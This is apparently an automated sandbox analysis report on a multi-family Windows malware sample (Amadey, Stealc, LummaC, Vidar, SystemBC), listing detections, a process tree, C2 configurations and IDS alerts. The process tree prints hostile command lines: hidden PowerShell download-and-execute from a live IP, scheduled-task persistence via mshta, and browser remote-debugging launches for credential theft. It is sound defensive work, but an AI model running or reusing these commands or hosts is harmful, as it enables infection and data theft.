Windows
Analysis Report
aV2ffcSuKl.exe
Overview
General Information
Sample name: | aV2ffcSuKl.exerenamed because original name is a hash value |
Original sample name: | 29dbe0a1208dfedac751f580a83fca87.exe |
Analysis ID: | 1630726 |
MD5: | 29dbe0a1208dfedac751f580a83fca87 |
SHA1: | 5dba16b31a81c541525a169fd76426e7ae9a04fd |
SHA256: | bced8cc13d6bccdb3f54e578f084b0d31fb987022d2c5e582f3ba31bb77370f9 |
Tags: | exeuser-abuse_ch |
Infos: | |
Detection
Amadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, SystemBC, Vidar
Score: | 100 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected GCleaner
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected SystemBC
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates HTA files
Creates HTML files with .exe extension (expired dropper behavior)
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Monitors registry run keys for changes
PE file contains section with special chars
Powershell drops PE file
Sample uses string decryption to hide its real strings
Send many emails (e-Mail Spam)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Connects to many different domains
Connects to several IPs in different countries
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Tries to resolve many domain names, but no domain seems valid
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
aV2ffcSuKl.exe (PID: 7952 cmdline:
"C:\Users\ user\Deskt op\aV2ffcS uKl.exe" MD5: 29DBE0A1208DFEDAC751F580A83FCA87) cmd.exe (PID: 8000 cmdline:
C:\Windows \system32\ cmd.exe /c schtasks /create /t n bseb5ma1 dDD /tr "m shta C:\Us ers\user\A ppData\Loc al\Temp\sG wBNuRjx.ht a" /sc min ute /mo 25 /ru "user " /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 8012 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) schtasks.exe (PID: 8076 cmdline:
schtasks / create /tn bseb5ma1d DD /tr "ms hta C:\Use rs\user\Ap pData\Loca l\Temp\sGw BNuRjx.hta " /sc minu te /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965) mshta.exe (PID: 8020 cmdline:
mshta C:\U sers\user\ AppData\Lo cal\Temp\s GwBNuRjx.h ta MD5: 06B02D5C097C7DB1F109749C45F3F505) powershell.exe (PID: 8132 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden $d=$env:te mp+'P9Z71N KG5FBJTHRS WGFERGT0AN YFFESN.EXE ';(New-Obj ect System .Net.WebCl ient).Down loadFile(' http://176 .113.115.7 /mine/rand om.exe',$d );Start-Pr ocess $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 8156 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE (PID: 2668 cmdline:
"C:\Users\ user\AppDa ta\Local\T empP9Z71NK G5FBJTHRSW GFERGT0ANY FFESN.EXE" MD5: 00C6B612E1A33CCE7BE3A28B82492A84) rapes.exe (PID: 3308 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\bb556c ff4a\rapes .exe" MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
mshta.exe (PID: 6172 cmdline:
C:\Windows \system32\ mshta.EXE C:\Users\u ser\AppDat a\Local\Te mp\sGwBNuR jx.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) powershell.exe (PID: 7096 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden $d=$env:te mp+'P9Z71N KG5FBJTHRS WGFERGT0AN YFFESN.EXE ';(New-Obj ect System .Net.WebCl ient).Down loadFile(' http://176 .113.115.7 /mine/rand om.exe',$d );Start-Pr ocess $d; MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE (PID: 1736 cmdline:
"C:\Users\ user\AppDa ta\Local\T empP9Z71NK G5FBJTHRSW GFERGT0ANY FFESN.EXE" MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
rapes.exe (PID: 8120 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\bb556cf f4a\rapes. exe MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
rapes.exe (PID: 2188 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\bb556cf f4a\rapes. exe MD5: 00C6B612E1A33CCE7BE3A28B82492A84) nhDLtPT.exe (PID: 6360 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101073 10101\nhDL tPT.exe" MD5: A9749EE52EEFB0FD48A66527095354BB) Gxtuum.exe (PID: 784 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\a58456 755d\Gxtuu m.exe" MD5: A9749EE52EEFB0FD48A66527095354BB) ILqcVeT.exe (PID: 4156 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101094 40101\ILqc VeT.exe" MD5: F0AD59C5E3EB8DA5CBBF9C731371941C) chrome.exe (PID: 7972 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --re mote-debug ging-port= 9229 --pro file-direc tory="" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) chrome.exe (PID: 876 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2436 --fi eld-trial- handle=215 6,i,114299 1497713002 09,1457107 9960237731 48,262144 /prefetch: 8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA) msedge.exe (PID: 5204 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --remot e-debuggin g-port=922 9 --profil e-director y="" MD5: 69222B8101B0601CC6663F8381E7E00F) msedge.exe (PID: 2032 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=24 00 --field -trial-han dle=2228,i ,893657121 0459543028 ,101983785 8279177312 7,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) rXOl0pp.exe (PID: 8104 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101094 90101\rXOl 0pp.exe" MD5: F0AD59C5E3EB8DA5CBBF9C731371941C) 132fd7f0ed.exe (PID: 2704 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101110 50101\132f d7f0ed.exe " MD5: CB7D258E67E7C7B732E4E03C40355FF0) cmd.exe (PID: 5484 cmdline:
C:\Windows \system32\ cmd.exe /c schtasks /create /t n flwMsmav zAp /tr "m shta C:\Us ers\user\A ppData\Loc al\Temp\rK RHHhiYP.ht a" /sc min ute /mo 25 /ru "user " /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 5964 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) schtasks.exe (PID: 5532 cmdline:
schtasks / create /tn flwMsmavz Ap /tr "ms hta C:\Use rs\user\Ap pData\Loca l\Temp\rKR HHhiYP.hta " /sc minu te /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965) mshta.exe (PID: 6608 cmdline:
mshta C:\U sers\user\ AppData\Lo cal\Temp\r KRHHhiYP.h ta MD5: 06B02D5C097C7DB1F109749C45F3F505) powershell.exe (PID: 7196 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden $d=$env:te mp+'UBI6CW IX4UP8VUJR 6IRMVEHAKP W6ZCWX.EXE ';(New-Obj ect System .Net.WebCl ient).Down loadFile(' http://176 .113.115.7 /mine/rand om.exe',$d );Start-Pr ocess $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 7280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE (PID: 4332 cmdline:
"C:\Users\ user\AppDa ta\Local\T empUBI6CWI X4UP8VUJR6 IRMVEHAKPW 6ZCWX.EXE" MD5: 00C6B612E1A33CCE7BE3A28B82492A84) cmd.exe (PID: 6556 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\1011 1060121\am _no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 6816 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) timeout.exe (PID: 5160 cmdline:
timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3) cmd.exe (PID: 7008 cmdline:
C:\Windows \system32\ cmd.exe /c powershel l -command "-join (( 48..57) + (65..90) + (97..122) | Get-Ran dom -Count 9 | ForEa ch-Object {[char]$_} )" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) powershell.exe (PID: 4772 cmdline:
powershell -command "-join ((4 8..57) + ( 65..90) + (97..122) | Get-Rand om -Count 9 | ForEac h-Object { [char]$_}) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) cmd.exe (PID: 5656 cmdline:
C:\Windows \system32\ cmd.exe /c powershel l -command "-join (( 48..57) + (65..90) + (97..122) | Get-Ran dom -Count 5 | ForEa ch-Object {[char]$_} )" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) powershell.exe (PID: 6296 cmdline:
powershell -command "-join ((4 8..57) + ( 65..90) + (97..122) | Get-Rand om -Count 5 | ForEac h-Object { [char]$_}) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) cmd.exe (PID: 7216 cmdline:
C:\Windows \system32\ cmd.exe /c powershel l -command "-join (( 48..57) + (65..90) + (97..122) | Get-Ran dom -Count 4 | ForEa ch-Object {[char]$_} )" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) powershell.exe (PID: 5528 cmdline:
powershell -command "-join ((4 8..57) + ( 65..90) + (97..122) | Get-Rand om -Count 4 | ForEac h-Object { [char]$_}) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) schtasks.exe (PID: 4632 cmdline:
schtasks / create /tn "U6NDLmax nYP" /tr "mshta \" C:\Temp\pl DCQRtK9.ht a\"" /sc minute /m o 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965) mshta.exe (PID: 6124 cmdline:
mshta "C:\ Temp\plDCQ RtK9.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) powershell.exe (PID: 7836 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden $d=$env:te mp+'\483d2 fa8a0d5381 8306efeb32 d3.exe';(N ew-Object System.Net .WebClient ).Download File('http ://176.113 .115.7/min e/random.e xe',$d);St art-Proces s $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 1884 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 7dbaa342f5.exe (PID: 2656 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101111 80101\7dba a342f5.exe " MD5: 473C98DE49CD906F1DB4F35F75AF2DB6)
Gxtuum.exe (PID: 7800 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\a584567 55d\Gxtuum .exe MD5: A9749EE52EEFB0FD48A66527095354BB) vertualiziren.exe (PID: 8076 cmdline:
"C:\Users\ user\AppDa ta\Roaming \100007701 00\vertual iziren.exe " MD5: 1DC908064451D5D79018241CEA28BC2F)
svchost.exe (PID: 7092 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
benskvi.exe (PID: 3108 cmdline:
C:\Program Data\jnxne e\benskvi. exe MD5: 1DC908064451D5D79018241CEA28BC2F)
mshta.exe (PID: 7572 cmdline:
C:\Windows \system32\ mshta.EXE C:\Users\u ser\AppDat a\Local\Te mp\rKRHHhi YP.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) powershell.exe (PID: 3572 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden $d=$env:te mp+'UBI6CW IX4UP8VUJR 6IRMVEHAKP W6ZCWX.EXE ';(New-Obj ect System .Net.WebCl ient).Down loadFile(' http://176 .113.115.7 /mine/rand om.exe',$d );Start-Pr ocess $d; MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE (PID: 2256 cmdline:
"C:\Users\ user\AppDa ta\Local\T empUBI6CWI X4UP8VUJR6 IRMVEHAKPW 6ZCWX.EXE" MD5: 00C6B612E1A33CCE7BE3A28B82492A84)
msedge.exe (PID: 3128 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --remot e-debuggin g-port=922 9 --profil e-director y --flag-s witches-be gin --flag -switches- end --disa ble-nacl - -do-not-de -elevate MD5: 69222B8101B0601CC6663F8381E7E00F) msedge.exe (PID: 6948 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=23 72 --field -trial-han dle=2136,i ,809799231 9961427004 ,175579959 0517834485 2,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
mshta.exe (PID: 5212 cmdline:
C:\Windows \system32\ mshta.EXE "C:\Temp\p lDCQRtK9.h ta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
132fd7f0ed.exe (PID: 3668 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\101110 50101\132f d7f0ed.exe " MD5: CB7D258E67E7C7B732E4E03C40355FF0) cmd.exe (PID: 5272 cmdline:
C:\Windows \system32\ cmd.exe /c schtasks /create /t n UIP4Bmak pNx /tr "m shta C:\Us ers\user\A ppData\Loc al\Temp\1l Et3ife9.ht a" /sc min ute /mo 25 /ru "user " /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 2876 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) schtasks.exe (PID: 6948 cmdline:
schtasks / create /tn UIP4Bmakp Nx /tr "ms hta C:\Use rs\user\Ap pData\Loca l\Temp\1lE t3ife9.hta " /sc minu te /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965) mshta.exe (PID: 5784 cmdline:
mshta C:\U sers\user\ AppData\Lo cal\Temp\1 lEt3ife9.h ta MD5: 06B02D5C097C7DB1F109749C45F3F505) powershell.exe (PID: 6060 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden $d=$env:te mp+'JAW3XT C7QCB11DRD HXKDZL05FS NPG4P3.EXE ';(New-Obj ect System .Net.WebCl ient).Down loadFile(' http://176 .113.115.7 /mine/rand om.exe',$d );Start-Pr ocess $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 4772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
GCleaner | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SystemBC | SystemBC is a multiplatform proxy malware active since August 2019. It creates SOCKS5 network tunnels in the victims network and connects to its C2 server using a custom, RC4-encrypted protocol. It can also download and execute additional malware, with payloads either written to disk or mapped into memory. The SystemBC kit, including the C2 panel, server, and malware executables, is sold in underground forums. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Vidar | Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. | No Attribution |
{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
{"C2 addresses": ["185.156.73.73", "45.91.200.135"]}
{"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security | ||
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | ||
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | ||
JoeSecurity_Amadey_3 | Yara detected Amadey\'s Clipper DLL | Joe Security | ||
JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security | ||
JoeSecurity_Obshtml | Yara detected obfuscated html page | Joe Security | ||
Click to see the 4 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Amadey_3 | Yara detected Amadey\'s Clipper DLL | Joe Security | ||
JoeSecurity_Amadey_3 | Yara detected Amadey\'s Clipper DLL | Joe Security | ||
JoeSecurity_Amadey_3 | Yara detected Amadey\'s Clipper DLL | Joe Security | ||
JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
JoeSecurity_Stealc | Yara detected Stealc | Joe Security | ||
Click to see the 47 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security | ||
JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security | ||
JoeSecurity_GCleaner | Yara detected GCleaner | Joe Security | ||
JoeSecurity_Amadey_3 | Yara detected Amadey\'s Clipper DLL | Joe Security | ||
JoeSecurity_Amadey_3 | Yara detected Amadey\'s Clipper DLL | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
Click to see the 1 entries |
System Summary |
---|
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Jonathan Cheong, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: |
Source: | Author: vburov: |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-03-06T08:10:58.872169+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 59943 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:01.455608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64532 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:05.348829+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64586 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:09.589956+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64662 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:13.746062+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64756 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:17.035737+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64821 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:17.506679+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 64823 | 23.197.127.21 | 443 | TCP |
2025-03-06T08:11:22.001493+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53736 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:22.501727+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53747 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:24.572361+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53889 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:26.211732+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53928 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:27.470136+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53950 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:27.889618+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 53957 | 104.21.80.1 | 443 | TCP |
2025-03-06T08:11:28.828094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50532 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:30.423814+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50549 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:31.777050+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50574 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:33.146362+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50611 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:34.573818+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50636 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:35.951803+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50654 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:37.407242+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50676 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:39.107647+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50703 | 104.21.24.225 | 443 | TCP |
2025-03-06T08:11:41.153251+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50732 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:43.141219+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50776 | 104.21.48.1 | 443 | TCP |
2025-03-06T08:11:43.420367+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.11 | 50783 | 104.21.24.225 | 443 | TCP |
